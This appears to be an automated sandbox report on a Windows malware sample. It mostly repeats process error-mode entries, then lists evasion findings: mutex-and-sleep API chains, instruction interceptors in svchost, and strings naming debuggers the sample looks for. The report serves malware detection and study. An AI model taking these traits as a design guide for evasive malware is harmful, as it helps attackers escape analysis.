                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_0040CCF04_2_0040CCF0
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_0040CCF05_2_0040CCF0
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040CCF07_2_0040CCF0
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-4355
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-4355
                          Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-4357
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                          Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-4357
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                          Source: C:\Windows\System32\dwm.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeAPI/Special instruction interceptor: Address: 7FFEFE52D044
                          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFEFE52D044
                          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 542B83A
                          Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                          Source: 2779421088.exe, 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                          Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU
                          Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
